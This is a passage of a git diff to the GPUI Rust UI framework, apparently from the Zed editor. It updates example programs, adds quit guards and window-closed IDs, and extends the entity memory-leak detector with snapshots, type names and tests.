- ), + // Now GPUI supports nested deferred! + deferred( + anchored() + .anchor(Corner::TopLeft) + .snap_to_window_with_margin(px(8.)) + .child( + popover() + .child("This is second level Popover with nested deferred!") + .bg(gpui::white()) + .border_color(gpui::blue()) + .on_mouse_down_out(cx.listener(|this, _, _, cx| { + this.secondary_open = false; + cx.notify(); + })), + ), + ) + .priority(2), ) }) } diff --git a/crates/gpui/examples/set_menus.rs b/crates/gpui/examples/set_menus.rs index 683793c35fd4d356c068a3c36b041fba1dbc5ecf..a07f3c36abcc86390595c73f9c6eae55c3c370ef 100644 --- a/crates/gpui/examples/set_menus.rs +++ b/crates/gpui/examples/set_menus.rs @@ -2,7 +2,7 @@ use gpui::{ App, Context, Global, Menu, MenuItem, SharedString, SystemMenuType, Window, WindowOptions, - actions, div, prelude::*, rgb, + actions, div, prelude::*, }; use gpui_platform::application; @@ -12,12 +12,12 @@ impl Render for SetMenus { fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { div() .flex() - .bg(rgb(0x2e7d32)) + .bg(gpui::white()) .size_full() .justify_center() .items_center() .text_xl() - .text_color(rgb(0xffffff)) + .text_color(gpui::black()) .child("Set Menus Example") } } @@ -28,7 +28,8 @@ fn run_example() { // Bring the menu bar to the foreground (so you can see the menu bar) cx.activate(true); - // Register the `quit` function so it can be referenced by the `MenuItem::action` in the menu bar + // Register the `quit` function so it can be referenced + // by the `MenuItem::action` in the menu bar cx.on_action(quit); cx.on_action(toggle_check); // Add menu items @@ -91,19 +92,24 @@ impl Global for AppState {} fn set_app_menus(cx: &mut App) { let app_state = cx.global::(); - cx.set_menus(vec![Menu { - name: "set_menus".into(), - items: vec![ - MenuItem::os_submenu("Services", SystemMenuType::Services), - MenuItem::separator(), - MenuItem::action(ViewMode::List, ToggleCheck) - .checked(app_state.view_mode == ViewMode::List), - MenuItem::action(ViewMode::Grid, ToggleCheck) - .checked(app_state.view_mode == ViewMode::Grid), - MenuItem::separator(), - MenuItem::action("Quit", Quit), - ], - }]); + cx.set_menus([Menu::new("set_menus").items([ + MenuItem::os_submenu("Services", SystemMenuType::Services), + MenuItem::separator(), + MenuItem::action("Disabled Item", gpui::NoAction).disabled(true), + MenuItem::submenu(Menu::new("Disabled Submenu").disabled(true)), + MenuItem::separator(), + MenuItem::action("List Mode", ToggleCheck).checked(app_state.view_mode == ViewMode::List), + MenuItem::submenu( + Menu::new("Mode").items([ + MenuItem::action(ViewMode::List, ToggleCheck) + .checked(app_state.view_mode == ViewMode::List), + MenuItem::action(ViewMode::Grid, ToggleCheck) + .checked(app_state.view_mode == ViewMode::Grid), + ]), + ), + MenuItem::separator(), + MenuItem::action("Quit", Quit), + ])]); } // Associate actions using the `actions!` macro (or `Action` derive macro) @@ -111,7 +117,7 @@ actions!(set_menus, [Quit, ToggleCheck]); // Define the quit function that is registered with the App fn quit(_: &Quit, cx: &mut App) { - println!("Gracefully quitting the application . . ."); + println!("Gracefully quitting the application..."); cx.quit(); } diff --git a/crates/gpui/examples/text.rs b/crates/gpui/examples/text.rs index acaf4fe83a49726e0a3c641ca577bf75c54e224d..418ebaabf69da8717dcdd6aa5960abd986b6d05d 100644 --- a/crates/gpui/examples/text.rs +++ b/crates/gpui/examples/text.rs @@ -1,6 +1,7 @@ #![cfg_attr(target_family = "wasm", no_main)] use std::{ + borrow::Cow, ops::{Deref, DerefMut}, sync::Arc, }; @@ -204,7 +205,7 @@ impl RenderOnce for CharacterGrid { "❮", "<=", "!=", "==", "--", "++", "=>", "->", "🏀", "🎊", "😍", "❤️", "👍", "👎", ]; - let columns = 11; + let columns = 20; let rows = characters.len().div_ceil(columns); let grid_rows = (0..rows).map(|row_idx| { @@ -238,6 +239,7 @@ impl RenderOnce for CharacterGrid { struct TextExample { next_id: usize, + font_family: SharedString, } impl TextExample { @@ -245,8 +247,33 @@ impl TextExample { self.next_id += 1; self.next_id } + + fn button( + text: &str, + cx: &mut Context, + on_click: impl Fn(&mut Self, &mut Context) + 'static, + ) -> impl IntoElement { + div() + .id(text.to_string()) + .flex_none() + .child(text.to_string()) + .bg(gpui::black()) + .text_color(gpui::white()) + .active(|this| this.opacity(0.8)) + .px_3() + .py_1() + .on_click(cx.listener(move |this, _, _, cx| on_click(this, cx))) + } } +const FONT_FAMILIES: [&str; 5] = [ + ".ZedMono", + ".SystemUIFont", + "Menlo", + "Monaco", + "Courier New", +]; + impl Render for TextExample { fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { let tcx = cx.text_context(); @@ -265,7 +292,26 @@ impl Render for TextExample { let step_up_6 = step_up_5 * type_scale; div() + .font_family(self.font_family.clone()) .size_full() + .child( + div() + .bg(gpui::white()) + .border_b_1() + .border_color(gpui::black()) + .p_3() + .flex() + .child(Self::button(&self.font_family, cx, |this, cx| { + let new_family = FONT_FAMILIES + .iter() + .position(|f| *f == this.font_family.as_str()) + .map(|idx| FONT_FAMILIES[(idx + 1) % FONT_FAMILIES.len()]) + .unwrap_or(FONT_FAMILIES[0]); + + this.font_family = SharedString::new(new_family); + cx.notify(); + })), + ) .child( div() .id("text-example") @@ -304,9 +350,19 @@ fn run_example() { application().run(|cx: &mut App| { cx.set_menus(vec![Menu { name: "GPUI Typography".into(), + disabled: false, items: vec![], }]); + let fonts = [include_bytes!( + "../../../assets/fonts/lilex/Lilex-Regular.ttf" + )] + .iter() + .map(|b| Cow::Borrowed(&b[..])) + .collect(); + + _ = cx.text_system().add_fonts(fonts); + cx.init_colors(); cx.set_global(GlobalTextContext(Arc::new(TextContext::default()))); @@ -323,7 +379,12 @@ fn run_example() { ))), ..Default::default() }, - |_window, cx| cx.new(|_cx| TextExample { next_id: 0 }), + |_window, cx| { + cx.new(|_cx| TextExample { + next_id: 0, + font_family: ".ZedMono".into(), + }) + }, ) .unwrap(); diff --git a/crates/gpui/src/action.rs b/crates/gpui/src/action.rs index 1ab619ff171dbeab8a0843393874e7184320e0db..a47ebe69f0d825c6e2c347ea2881180cb5b04573 100644 --- a/crates/gpui/src/action.rs +++ b/crates/gpui/src/action.rs @@ -1,7 +1,7 @@ use anyhow::{Context as _, Result}; use collections::HashMap; pub use gpui_macros::Action; -pub use no_action::{NoAction, is_no_action}; +pub use no_action::{NoAction, Unbind, is_no_action, is_unbind}; use serde_json::json; use std::{ any::{Any, TypeId}, @@ -290,19 +290,6 @@ impl ActionRegistry { } } - #[cfg(test)] - pub(crate) fn load_action(&mut self) { - self.insert_action(MacroActionData { - name: A::name_for_type(), - type_id: TypeId::of::
(), - build: A::build, - json_schema: A::action_json_schema, - deprecated_aliases: A::deprecated_aliases(), - deprecation_message: A::deprecation_message(), - documentation: A::documentation(), - }); - } - fn insert_action(&mut self, action: MacroActionData) { let name = action.name; if self.by_name.contains_key(name) { @@ -432,7 +419,8 @@ pub fn generate_list_of_all_registered_actions() -> impl Iterator bool { - action.as_any().type_id() == (NoAction {}).type_id() + action.as_any().is::() + } + + /// Returns whether or not this action represents an unbind marker. + pub fn is_unbind(action: &dyn gpui::Action) -> bool { + action.as_any().is::() } } diff --git a/crates/gpui/src/app.rs b/crates/gpui/src/app.rs index 1bd5cd6b3c6a74ee840ac93b08554a82b1f050fa..3453364a20ebf59bef6940656f79cbfdaf732c22 100644 --- a/crates/gpui/src/app.rs +++ b/crates/gpui/src/app.rs @@ -27,9 +27,13 @@ use collections::{FxHashMap, FxHashSet, HashMap, VecDeque}; pub use context::*; pub use entity_map::*; use gpui_util::{ResultExt, debug_panic}; +#[cfg(any(test, feature = "test-support"))] +pub use headless_app_context::*; use http_client::{HttpClient, Url}; use smallvec::SmallVec; #[cfg(any(test, feature = "test-support"))] +pub use test_app::*; +#[cfg(any(test, feature = "test-support"))] pub use test_context::*; #[cfg(all(target_os = "macos", any(test, feature = "test-support")))] pub use visual_test_context::*; @@ -45,7 +49,8 @@ use crate::{ PlatformKeyboardMapper, Point, Priority, PromptBuilder, PromptButton, PromptHandle, PromptLevel, Render, RenderImage, RenderablePromptHandle, Reservation, ScreenCaptureSource, SharedString, SubscriberSet, Subscription, SvgRenderer, Task, TextRenderingMode, TextSystem, - ThermalState, Window, WindowAppearance, WindowHandle, WindowId, WindowInvalidator, + ThermalState, Window, WindowAppearance, WindowButtonLayout, WindowHandle, WindowId, + WindowInvalidator, colors::{Colors, GlobalColors}, hash, init_app_menus, }; @@ -54,6 +59,10 @@ mod async_context; mod context; mod entity_map; #[cfg(any(test, feature = "test-support"))] +mod headless_app_context; +#[cfg(any(test, feature = "test-support"))] +mod test_app; +#[cfg(any(test, feature = "test-support"))] mod test_context; #[cfg(all(target_os = "macos", any(test, feature = "test-support")))] mod visual_test_context; @@ -232,7 +241,7 @@ type Listener = Box bool + 'static>; pub(crate) type KeystrokeObserver = Box bool + 'static>; type QuitHandler = Box LocalBoxFuture<'static, ()> + 'static>; -type WindowClosedHandler = Box; +type WindowClosedHandler = Box; type ReleaseListener = Box; type NewEntityListener = Box, &mut App) + 'static>; @@ -571,21 +580,13 @@ impl GpuiMode { pub struct App { pub(crate) this: Weak, pub(crate) platform: Rc, - pub(crate) mode: GpuiMode, text_system: Arc, - flushing_effects: bool, - pending_updates: usize, + pub(crate) actions: Rc, pub(crate) active_drag: Option, pub(crate) background_executor: BackgroundExecutor, pub(crate) foreground_executor: ForegroundExecutor, - pub(crate) loading_assets: FxHashMap<(TypeId, u64), Box>, - asset_source: Arc, - pub(crate) svg_renderer: SvgRenderer, - http_client: Arc, - pub(crate) globals_by_type: FxHashMap>, pub(crate) entities: EntityMap, - pub(crate) window_update_stack: Vec, pub(crate) new_entity_observers: SubscriberSet, pub(crate) windows: SlotMap>>, pub(crate) window_handles: FxHashMap, @@ -596,10 +597,8 @@ pub struct App { pub(crate) global_action_listeners: FxHashMap>>, pending_effects: VecDeque, - pub(crate) pending_notifications: FxHashSet, - pub(crate) pending_global_notifications: FxHashSet, + pub(crate) observers: SubscriberSet, - // TypeId is the type of the event that the listener callback expects pub(crate) event_listeners: SubscriberSet, pub(crate) keystroke_observers: SubscriberSet<(), KeystrokeObserver>, pub(crate) keystroke_interceptors: SubscriberSet<(), KeystrokeObserver>, @@ -609,8 +608,30 @@ pub struct App { pub(crate) global_observers: SubscriberSet, pub(crate) quit_observers: SubscriberSet<(), QuitHandler>, pub(crate) restart_observers: SubscriberSet<(), Handler>, - pub(crate) restart_path: Option, pub(crate) window_closed_observers: SubscriberSet<(), WindowClosedHandler>, + + /// Per-App element arena. This isolates element allocations between different + /// App instances (important for tests where multiple Apps run concurrently). + pub(crate) element_arena: RefCell, + /// Per-App event arena. + pub(crate) event_arena: Arena, + + // Drop globals last. We need to ensure all tasks owned by entities and + // callbacks are marked cancelled at this point as this will also shutdown + // the tokio runtime. As any task attempting to spawn a blocking tokio task, + // might panic. + pub(crate) globals_by_type: FxHashMap>, + + // assets + pub(crate) loading_assets: FxHashMap<(TypeId, u64), Box>, + asset_source: Arc, + pub(crate) svg_renderer: SvgRenderer, + http_client: Arc, + + // below is plain data, the drop order is insignificant here + pub(crate) pending_notifications: FxHashSet, + pub(crate) pending_global_notifications: FxHashSet, + pub(crate) restart_path: Option, pub(crate) layout_id_buffer: Vec, // We recycle this memory across layout requests. pub(crate) propagate_event: bool, pub(crate) prompt_builder: Option, @@ -624,13 +645,18 @@ pub struct App { #[cfg(any(test, feature = "test-support", debug_assertions))] pub(crate) name: Option<&'static str>, pub(crate) text_rendering_mode: Rc>, + + pub(crate) window_update_stack: Vec, + pub(crate) mode: GpuiMode, + flushing_effects: bool, + pending_updates: usize, quit_mode: QuitMode, quitting: bool, - /// Per-App element arena. This isolates element allocations between different - /// App instances (important for tests where multiple Apps run concurrently). - pub(crate) element_arena: RefCell, - /// Per-App event arena. - pub(crate) event_arena: Arena, + + // We need to ensure the leak detector drops last, after all tasks, callbacks and things have been dropped. + // Otherwise it may report false positives. + #[cfg(any(test, feature = "leak-detection"))] + _ref_counts: Arc>, } impl App { @@ -652,6 +678,9 @@ impl App { let keyboard_layout = platform.keyboard_layout(); let keyboard_mapper = platform.keyboard_mapper(); + #[cfg(any(test, feature = "leak-detection"))] + let _ref_counts = entities.ref_counts_drop_handle(); + let app = Rc::new_cyclic(|this| AppCell { app: RefCell::new(App { this: this.clone(), @@ -711,6 +740,9 @@ impl App { name: None, element_arena: RefCell::new(Arena::new(1024 * 1024)), event_arena: Arena::new(1024 * 1024), + + #[cfg(any(test, feature = "leak-detection"))] + _ref_counts, }), }); @@ -744,15 +776,48 @@ impl App { })); platform.on_quit(Box::new({ - let cx = app.clone(); + let cx = Rc::downgrade(&app); move || { - cx.borrow_mut().shutdown(); + if let Some(cx) = cx.upgrade() { + cx.borrow_mut().shutdown(); + } } })); app } + #[doc(hidden)] + pub fn ref_counts_drop_handle(&self) -> impl Sized + use<> { + self.entities.ref_counts_drop_handle() + } + + /// Captures a snapshot of all entities that currently have alive handles. + /// + /// The returned [`LeakDetectorSnapshot`] can later be passed to + /// [`assert_no_new_leaks`](Self::assert_no_new_leaks) to verify that no + /// entities created after the snapshot are still alive. + #[cfg(any(test, feature = "leak-detection"))] + pub fn leak_detector_snapshot(&self) -> LeakDetectorSnapshot { + self.entities.leak_detector_snapshot() + } + + /// Asserts that no entities created after `snapshot` still have alive handles. + /// + /// Entities that were already tracked at the time of the snapshot are ignored, + /// even if they still have handles. Only *new* entities (those whose + /// `EntityId` was not present in the snapshot) are considered leaks. + /// + /// # Panics + /// + /// Panics if any new entity handles exist. The panic message lists every + /// leaked entity with its type name, and includes allocation-site backtraces + /// when `LEAK_BACKTRACE` is set. + #[cfg(any(test, feature = "leak-detection"))] + pub fn assert_no_new_leaks(&self, snapshot: &LeakDetectorSnapshot) { + self.entities.assert_no_new_leaks(snapshot) + } + /// Quit the application gracefully. Handlers registered with [`Context::on_app_quit`] /// will be given 100ms to complete before exiting. pub fn shutdown(&mut self) { @@ -1113,6 +1178,11 @@ impl App { self.platform.window_appearance() } + /// Returns the window button layout configuration when supported. + pub fn button_layout(&self) -> Option { + self.platform.button_layout() + } + /// Reads data from the platform clipboard. pub fn read_from_clipboard(&self) -> Option { self.platform.read_from_clipboard() @@ -1497,7 +1567,7 @@ impl App { cx.windows.remove(id); cx.window_closed_observers.clone().retain(&(), |callback| { - callback(cx); + callback(cx, id); true }); @@ -1971,7 +2041,10 @@ impl App { /// Register a callback to be invoked when a window is closed /// The window is no longer accessible at the point this callback is invoked. - pub fn on_window_closed(&self, mut on_closed: impl FnMut(&mut App) + 'static) -> Subscription { + pub fn on_window_closed( + &self, + mut on_closed: impl FnMut(&mut App, WindowId) + 'static, + ) -> Subscription { let (subscription, activate) = self.window_closed_observers.insert((), Box::new(on_closed)); activate(); subscription @@ -2008,7 +2081,8 @@ impl App { } /// Sets the menu bar for this application. This will replace any existing menu bar. - pub fn set_menus(&self, menus: Vec) { + pub fn set_menus(&self, menus: impl IntoIterator) { + let menus: Vec = menus.into_iter().collect(); self.platform.set_menus(menus, &self.keymap.borrow()); } @@ -2286,13 +2360,12 @@ impl AppContext for App { let entity = build_entity(&mut Context::new_context(cx, slot.downgrade())); cx.push_effect(Effect::EntityCreated { - entity: handle.clone().into_any(), + entity: handle.into_any(), tid: TypeId::of::(), window: cx.window_update_stack.last().cloned(), }); - cx.entities.insert(slot, entity); - handle + cx.entities.insert(slot, entity) }) } @@ -2582,13 +2655,6 @@ impl<'a, T> Drop for GpuiBorrow<'a, T> { } } -impl Drop for App { - fn drop(&mut self) { - self.foreground_executor.close(); - self.background_executor.close(); - } -} - #[cfg(test)] mod test { use std::{cell::RefCell, rc::Rc}; diff --git a/crates/gpui/src/app/async_context.rs b/crates/gpui/src/app/async_context.rs index ccd39dda89003cf90d51fae43102a565b2136dc2..e2fd203c78364a4d096f9792dcea7e6f7b8113ea 100644 --- a/crates/gpui/src/app/async_context.rs +++ b/crates/gpui/src/app/async_context.rs @@ -4,7 +4,7 @@ use crate::{ PromptLevel, Render, Reservation, Result, Subscription, Task, VisualContext, Window, WindowHandle, }; -use anyhow::Context as _; +use anyhow::{Context as _, bail}; use derive_more::{Deref, DerefMut}; use futures::channel::oneshot; use futures::future::FutureExt; @@ -88,6 +88,9 @@ impl AppContext for AsyncApp { { let app = self.app.upgrade().context("app was released")?; let mut lock = app.try_borrow_mut()?; + if lock.quitting { + bail!("app is quitting"); + } lock.update_window(window, f) } @@ -101,6 +104,9 @@ impl AppContext for AsyncApp { { let app = self.app.upgrade().context("app was released")?; let lock = app.borrow(); + if lock.quitting { + bail!("app is quitting"); + } lock.read_window(window, read) } @@ -174,6 +180,9 @@ impl AsyncApp { { let app = self.app(); let mut lock = app.borrow_mut(); + if lock.quitting { + bail!("app is quitting"); + } lock.open_window(options, build_root_view) } @@ -211,6 +220,9 @@ impl AsyncApp { pub fn try_read_global(&self, read: impl FnOnce(&G, &App) -> R) -> Option { let app = self.app(); let app = app.borrow_mut(); + if app.quitting { + return None; + } Some(read(app.try_global()?, &app)) } diff --git a/crates/gpui/src/app/context.rs b/crates/gpui/src/app/context.rs index c30a76bd9c8861d4d5b4d9dc4b5893ffeb2eb4b8..c2c74a0d57c8f0abff26ff0d19f6ef4de9e95244 100644 --- a/crates/gpui/src/app/context.rs +++ b/crates/gpui/src/app/context.rs @@ -479,6 +479,24 @@ impl<'a, T: 'static> Context<'a, T> { subscription } + /// Registers a callback to be invoked when the window button layout changes. + pub fn observe_button_layout_changed( + &self, + window: &mut Window, + mut callback: impl FnMut(&mut T, &mut Window, &mut Context) + 'static, + ) -> Subscription { + let view = self.weak_entity(); + let (subscription, activate) = window.button_layout_observers.insert( + (), + Box::new(move |window, cx| { + view.update(cx, |view, cx| callback(view, window, cx)) + .is_ok() + }), + ); + activate(); + subscription + } + /// Register a callback to be invoked when a keystroke is received by the application /// in any window. Note that this fires after all other action and event mechanisms have resolved /// and that this API will not be invoked if the event's propagation is stopped. diff --git a/crates/gpui/src/app/entity_map.rs b/crates/gpui/src/app/entity_map.rs index b8d9e82680eb6978d073e3e51c420cef9f1f61ec..cc4eaee492618812f1ee361d549b5e0052dafc68 100644 --- a/crates/gpui/src/app/entity_map.rs +++ b/crates/gpui/src/app/entity_map.rs @@ -59,7 +59,8 @@ pub(crate) struct EntityMap { ref_counts: Arc>, } -struct EntityRefCounts { +#[doc(hidden)] +pub(crate) struct EntityRefCounts { counts: SlotMap, dropped_entity_ids: Vec, #[cfg(any(test, feature = "leak-detection"))] @@ -83,6 +84,32 @@ impl EntityMap { } } + #[doc(hidden)] + pub fn ref_counts_drop_handle(&self) -> Arc> { + self.ref_counts.clone() + } + + /// Captures a snapshot of all entities that currently have alive handles. + /// + /// The returned [`LeakDetectorSnapshot`] can later be passed to + /// [`assert_no_new_leaks`](Self::assert_no_new_leaks) to verify that no + /// entities created after the snapshot are still alive. + #[cfg(any(test, feature = "leak-detection"))] + pub fn leak_detector_snapshot(&self) -> LeakDetectorSnapshot { + self.ref_counts.read().leak_detector.snapshot() + } + + /// Asserts that no entities created after `snapshot` still have alive handles. + /// + /// See [`LeakDetector::assert_no_new_leaks`] for details. + #[cfg(any(test, feature = "leak-detection"))] + pub fn assert_no_new_leaks(&self, snapshot: &LeakDetectorSnapshot) { + self.ref_counts + .read() + .leak_detector + .assert_no_new_leaks(snapshot) + } + /// Reserve a slot for an entity, which you can subsequently use with `insert`. pub fn reserve(&self) -> Slot { let id = self.ref_counts.write().counts.insert(1.into()); @@ -225,7 +252,12 @@ pub struct AnyEntity { } impl AnyEntity { - fn new(id: EntityId, entity_type: TypeId, entity_map: Weak>) -> Self { + fn new( + id: EntityId, + entity_type: TypeId, + entity_map: Weak>, + #[cfg(any(test, feature = "leak-detection"))] type_name: &'static str, + ) -> Self { Self { entity_id: id, entity_type, @@ -236,7 +268,7 @@ impl AnyEntity { .unwrap() .write() .leak_detector - .handle_created(id), + .handle_created(id, Some(type_name)), entity_map, } } @@ -299,7 +331,7 @@ impl Clone for AnyEntity { .unwrap() .write() .leak_detector - .handle_created(self.entity_id), + .handle_created(self.entity_id, None), } } } @@ -395,7 +427,13 @@ impl Entity { T: 'static, { Self { - any_entity: AnyEntity::new(id, TypeId::of::(), entity_map), + any_entity: AnyEntity::new( + id, + TypeId::of::(), + entity_map, + #[cfg(any(test, feature = "leak-detection"))] + std::any::type_name::(), + ), entity_type: PhantomData, } } @@ -574,7 +612,7 @@ impl AnyWeakEntity { .unwrap() .write() .leak_detector - .handle_created(self.entity_id), + .handle_created(self.entity_id, None), }) } @@ -856,6 +894,9 @@ pub(crate) struct HandleId { /// created, all participating strong entities in this cycle will effectively /// leak as they cannot be released anymore. /// +/// Cycles can also happen if an entity owns a task or subscription that it +/// itself owns a strong reference to the entity again. +/// /// # Usage /// /// You can use `WeakEntity::assert_released` or `AnyWeakEntity::assert_released` @@ -881,7 +922,7 @@ pub(crate) struct HandleId { /// ``` /// /// This will capture and display backtraces for each leaked handle, helping you -/// identify where handles were created but not released. +/// identify where leaked handles were created. /// /// # How It Works /// @@ -892,7 +933,23 @@ pub(crate) struct HandleId { #[cfg(any(test, feature = "leak-detection"))] pub(crate) struct LeakDetector { next_handle_id: u64, - entity_handles: HashMap>>, + entity_handles: HashMap, +} + +/// A snapshot of the set of alive entities at a point in time. +/// +/// Created by [`LeakDetector::snapshot`]. Can later be passed to +/// [`LeakDetector::assert_no_new_leaks`] to verify that no new entity +/// handles remain between the snapshot and the current state. +#[cfg(any(test, feature = "leak-detection"))] +pub struct LeakDetectorSnapshot { + entity_ids: collections::HashSet, +} + +#[cfg(any(test, feature = "leak-detection"))] +struct EntityLeakData { + handles: HashMap>, + type_name: &'static str, } #[cfg(any(test, feature = "leak-detection"))] @@ -903,11 +960,21 @@ impl LeakDetector { /// the handle is dropped. If `LEAK_BACKTRACE` is set, captures a backtrace /// at the allocation site. #[track_caller] - pub fn handle_created(&mut self, entity_id: EntityId) -> HandleId { + pub fn handle_created( + &mut self, + entity_id: EntityId, + type_name: Option<&'static str>, + ) -> HandleId { let id = gpui_util::post_inc(&mut self.next_handle_id); let handle_id = HandleId { id }; - let handles = self.entity_handles.entry(entity_id).or_default(); - handles.insert( + let handles = self + .entity_handles + .entry(entity_id) + .or_insert_with(|| EntityLeakData { + handles: HashMap::default(), + type_name: type_name.unwrap_or(""), + }); + handles.handles.insert( handle_id, LEAK_BACKTRACE.then(backtrace::Backtrace::new_unresolved), ); @@ -919,8 +986,14 @@ impl LeakDetector { /// This removes the handle from tracking. The `handle_id` should be the same /// one returned by `handle_created` when the handle was allocated. pub fn handle_released(&mut self, entity_id: EntityId, handle_id: HandleId) { - let handles = self.entity_handles.entry(entity_id).or_default(); - handles.remove(&handle_id); + if let std::collections::hash_map::Entry::Occupied(mut data) = + self.entity_handles.entry(entity_id) + { + data.get_mut().handles.remove(&handle_id); + if data.get().handles.is_empty() { + data.remove(); + } + } } /// Asserts that all handles to the given entity have been released. @@ -932,12 +1005,13 @@ impl LeakDetector { /// otherwise it suggests setting the environment variable to get more info. pub fn assert_released(&mut self, entity_id: EntityId) { use std::fmt::Write as _; - let handles = self.entity_handles.entry(entity_id).or_default(); - if !handles.is_empty() { + + if let Some(data) = self.entity_handles.remove(&entity_id) { let mut out = String::new(); - for backtrace in handles.values_mut() { - if let Some(mut backtrace) = backtrace.take() { + for (_, backtrace) in data.handles { + if let Some(mut backtrace) = backtrace { backtrace.resolve(); + let backtrace = BacktraceFormatter(backtrace); writeln!(out, "Leaked handle:\n{:?}", backtrace).unwrap(); } else { writeln!( @@ -947,11 +1021,168 @@ impl LeakDetector { .unwrap(); } } - panic!("{out}"); + panic!("Handles for {} leaked:\n{out}", data.type_name); + } + } + + /// Captures a snapshot of all entity IDs that currently have alive handles. + /// + /// The returned [`LeakDetectorSnapshot`] can later be passed to + /// [`assert_no_new_leaks`](Self::assert_no_new_leaks) to verify that no + /// entities created after the snapshot are still alive. + pub fn snapshot(&self) -> LeakDetectorSnapshot { + LeakDetectorSnapshot { + entity_ids: self.entity_handles.keys().copied().collect(), + } + } + + /// Asserts that no entities created after `snapshot` still have alive handles. + /// + /// Entities that were already tracked at the time of the snapshot are ignored, + /// even if they still have handles. Only *new* entities (those whose + /// `EntityId` was not present in the snapshot) are considered leaks. + /// + /// # Panics + /// + /// Panics if any new entity handles exist. The panic message lists every + /// leaked entity with its type name, and includes allocation-site backtraces + /// when `LEAK_BACKTRACE` is set. + pub fn assert_no_new_leaks(&self, snapshot: &LeakDetectorSnapshot) { + use std::fmt::Write as _; + + let mut out = String::new(); + for (entity_id, data) in &self.entity_handles { + if snapshot.entity_ids.contains(entity_id) { + continue; + } + for (_, backtrace) in &data.handles { + if let Some(backtrace) = backtrace { + let mut backtrace = backtrace.clone(); + backtrace.resolve(); + let backtrace = BacktraceFormatter(backtrace); + writeln!( + out, + "Leaked handle for entity {} ({entity_id:?}):\n{:?}", + data.type_name, backtrace + ) + .unwrap(); + } else { + writeln!( + out, + "Leaked handle for entity {} ({entity_id:?}): (export LEAK_BACKTRACE to find allocation site)", + data.type_name + ) + .unwrap(); + } + } + } + + if !out.is_empty() { + panic!("New entity leaks detected since snapshot:\n{out}"); } } } +#[cfg(any(test, feature = "leak-detection"))] +impl Drop for LeakDetector { + fn drop(&mut self) { + use std::fmt::Write; + + if self.entity_handles.is_empty() || std::thread::panicking() { + return; + } + + let mut out = String::new(); + for (entity_id, data) in self.entity_handles.drain() { + for (_handle, backtrace) in data.handles { + if let Some(mut backtrace) = backtrace { + backtrace.resolve(); + let backtrace = BacktraceFormatter(backtrace); + writeln!( + out, + "Leaked handle for entity {} ({entity_id:?}):\n{:?}", + data.type_name, backtrace + ) + .unwrap(); + } else { + writeln!( + out, + "Leaked handle for entity {} ({entity_id:?}): (export LEAK_BACKTRACE to find allocation site)", + data.type_name + ) + .unwrap(); + } + } + } + panic!("Exited with leaked handles:\n{out}"); + } +} + +#[cfg(any(test, feature = "leak-detection"))] +struct BacktraceFormatter(backtrace::Backtrace); + +#[cfg(any(test, feature = "leak-detection"))] +impl fmt::Debug for BacktraceFormatter { + fn fmt(&self, fmt: &mut fmt::Formatter<'_>) -> fmt::Result { + use backtrace::{BacktraceFmt, BytesOrWideString, PrintFmt}; + + let style = if fmt.alternate() { + PrintFmt::Full + } else { + PrintFmt::Short + }; + + // When printing paths we try to strip the cwd if it exists, otherwise + // we just print the path as-is. Note that we also only do this for the + // short format, because if it's full we presumably want to print + // everything. + let cwd = std::env::current_dir(); + let mut print_path = move |fmt: &mut fmt::Formatter<'_>, path: BytesOrWideString<'_>| { + let path = path.into_path_buf(); + if style != PrintFmt::Full { + if let Ok(cwd) = &cwd { + if let Ok(suffix) = path.strip_prefix(cwd) { + return fmt::Display::fmt(&suffix.display(), fmt); + } + } + } + fmt::Display::fmt(&path.display(), fmt) + }; + + let mut f = BacktraceFmt::new(fmt, style, &mut print_path); + f.add_context()?; + let mut strip = true; + for frame in self.0.frames() { + if let [symbol, ..] = frame.symbols() + && let Some(name) = symbol.name() + && let Some(filename) = name.as_str() + { + match filename { + "test::run_test_in_process" + | "scheduler::executor::spawn_local_with_source_location::impl$1::poll > > > >,alloc::alloc::Global> > >" => { + strip = true + } + "gpui::app::entity_map::LeakDetector::handle_created" => { + strip = false; + continue; + } + "zed::main" => { + strip = true; + f.frame().backtrace_frame(frame)?; + } + _ => {} + } + } + if strip { + continue; + } + f.frame().backtrace_frame(frame)?; + } + f.finish()?; + Ok(()) + } +} + #[cfg(test)] mod test { use crate::EntityMap; @@ -1007,4 +1238,42 @@ mod test { vec![1], ); } + + #[test] + fn test_leak_detector_snapshot_no_leaks() { + let mut entity_map = EntityMap::new(); + + let slot = entity_map.reserve::(); + let pre_existing = entity_map.insert(slot, TestEntity { i: 1 }); + + let snapshot = entity_map.leak_detector_snapshot(); + + let slot = entity_map.reserve::(); + let temporary = entity_map.insert(slot, TestEntity { i: 2 }); + drop(temporary); + + entity_map.assert_no_new_leaks(&snapshot); + + drop(pre_existing); + } + + #[test] + #[should_panic(expected = "New entity leaks detected since snapshot")] + fn test_leak_detector_snapshot_detects_new_leak() { + let mut entity_map = EntityMap::new(); + + let slot = entity_map.reserve::(); + let pre_existing = entity_map.insert(slot, TestEntity { i: 1 }); + + let snapshot = entity_map.leak_detector_snapshot(); + + let slot = entity_map.reserve::(); + let leaked = entity_map.insert(slot, TestEntity { i: 2 }); + + // `leaked` is still alive, so this should panic. + entity_map.assert_no_new_leaks(&snapshot); + + drop(pre_existing); + drop(leaked); + } } diff --git a/crates/gpui/src/app/headless_app_context.rs b/crates/gpui/src/app/headless_app_context.rs new file mode 100644 index 0000000000000000000000000000000000000000..90dc8c8f0c0994e3f118916b2d004f7d90566ea7 --- /dev/null +++ b/crates/gpui/src/app/headless_app_context.rs @@ -0,0 +1,275 @@ +//! Cross-platform headless app context for tests that need real text shaping. +//! +//! This replaces the macOS-only `HeadlessMetalAppContext` with a platform-neutral +//! implementation backed by `TestPlatform`. Tests supply a real `PlatformTextSystem` +//! (e.g. `DirectWriteTextSystem` on Windows, `MacTextSystem` on macOS) to get +//! accurate glyph measurements while keeping everything else deterministic. +//! +//! Optionally, a renderer factory can be provided to enable real GPU rendering +//! and screenshot capture via [`HeadlessAppContext::capture_screenshot`]. + +use crate::{ + AnyView, AnyWindowHandle, App, AppCell, AppContext, AssetSource, BackgroundExecutor, Bounds, + Context, Entity, ForegroundExecutor, Global, Pixels, PlatformHeadlessRenderer, + PlatformTextSystem, Render, Reservation, Size, Task, TestDispatcher, TestPlatform, TextSystem, + Window, WindowBounds, WindowHandle, WindowOptions, + app::{GpuiBorrow, GpuiMode}, +}; +use anyhow::Result; +use image::RgbaImage; +use std::{future::Future, rc::Rc, sync::Arc, time::Duration}; + +/// A cross-platform headless app context for tests that need real text shaping. +/// +/// 